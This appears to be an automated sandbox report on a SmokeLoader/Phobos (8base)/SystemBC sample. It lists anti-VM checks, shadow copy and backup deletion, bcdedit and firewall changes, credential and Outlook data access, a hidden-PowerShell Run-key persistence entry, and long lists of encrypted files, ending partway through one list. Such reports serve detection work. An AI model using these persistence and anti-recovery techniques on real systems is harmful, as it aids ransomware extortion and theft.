Malware Analysis Report

2024-11-16 12:19

Sample ID 230626-fe4ycahe5z
Target 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27
SHA256 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27
Tags
smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27

Threat Level: Known bad

The file 6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27 was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor trojan phobos systembc agilenet collection evasion persistence ransomware spyware stealer themida

Phobos

SystemBC

SmokeLoader

Modifies boot configuration data using bcdedit

Renames multiple (451) files with added filename extension

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Deletes shadow copies

Downloads MZ/PE file

Deletes backup catalog

Modifies Windows Firewall

Executes dropped EXE

Deletes itself

Checks BIOS information in registry

Obfuscated with Agile.Net obfuscator

Themida packer

Loads dropped DLL

Reads user/profile data of web browsers

Drops startup file

Accesses Microsoft Outlook profiles

Adds Run key to start application

Checks whether UAC is enabled

Drops desktop.ini file(s)

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

outlook_office_path

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Interacts with shadow copies

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-06-26 04:48

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-26 04:48

Reported

2023-06-26 04:53

Platform

win7-20230621-en

Max time kernel

300s

Max time network

30s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Checks SCSI registry key(s)

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A

Suspicious behavior: EnumeratesProcesses

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Suspicious behavior: GetForegroundWindowSpam

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Suspicious behavior: MapViewOfSection

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeShutdownPrivilege | N/A | N/A | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe
PID 2040 wrote to memory of 1064 | N/A | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe | C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

Processes

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Network

N/A

Files

memory/1064-55-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1064-56-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2040-57-0x0000000000220000-0x0000000000229000-memory.dmp

memory/1064-58-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1064-60-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1220-59-0x0000000002240000-0x0000000002256000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-06-26 04:48

Reported

2023-06-26 04:53

Platform

win10-20230621-en

Max time kernel

300s

Max time network

264s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6fe7ba44d70927fd40d24aeb610d01888609122c75d35be1f4a0dbadbc6c0c27.exe"

Signatures

Phobos

ransomware phobos

SmokeLoader

trojan backdoor smokeloader

SystemBC

trojan systembc

Deletes shadow copies

ransomware

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\FFA2.exe | N/A

Modifies boot configuration data using bcdedit

ransomware evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A
N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A

Renames multiple (451) files with added filename extension

ransomware

Deletes backup catalog

ransomware

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A
N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\FFA2.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\FFA2.exe | N/A

Deletes itself

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Drops startup file

Description | Indicator | Process | Target
File created | \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\233.exe | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Local\Temp\FFA2.exe | N/A

Obfuscated with Agile.Net obfuscator

agilenet

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Accesses Microsoft Outlook profiles

collection

Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Windows\SysWOW64\explorer.exe | N/A

Adds Run key to start application

persistence

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\233 = "C:\\Users\\Admin\\AppData\\Local\\233.exe" | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\233 = "C:\\Users\\Admin\\AppData\\Local\\233.exe" | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
Key created | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Users\Admin\AppData\Local\Temp\3F9.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1032500962-593345068-3128969974-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\3F9.exe'\"" | C:\Users\Admin\AppData\Local\Temp\3F9.exe | N/A

Checks whether UAC is enabled

evasion trojan

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\FFA2.exe | N/A

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\$RECYCLE.BIN\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini | C:\Windows\SysWOW64\explorer.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\$Recycle.Bin\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-1032500962-593345068-3128969974-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Common Files\microsoft shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu Places\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A

Drops file in Program Files directory

Description | Indicator | Process | Target
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\DailyChallenges\SmallSpiderTile.jpg | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\agavedefaulticon96x96.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-40_altform-unplated_contrast-white.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_rename_18.svg.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Common Files\System\msadc\fr-FR\msaddsr.dll.mui | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\de-de\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.controlpanel.ui.ja_5.5.0.165303.jar | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Home\contrast-black\SmallTile.scale-125.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Microsoft Office\root\Office16\1033\ExcelNaiveBayesCommandRanker.txt.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Microsoft.Graphics.Canvas.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Arkadium.Win10.DailyChallenges\Assets\Animation\coin-partcles-landing.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\ui-strings.js.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sk.pak | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jre1.8.0_66\bin\JAWTAccessBridge-64.dll | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HalfPrice3.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Jumbo\mask\cardback.png | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutImage.layoutdir-RTL.gif | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\eula.ini | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File created | C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sv-se.dll.id[5C6843C2-3483].[[email protected]].8base | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
File opened for modification | C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar | C:\Users\Admin\AppData\Local\Temp\233.exe | N/A
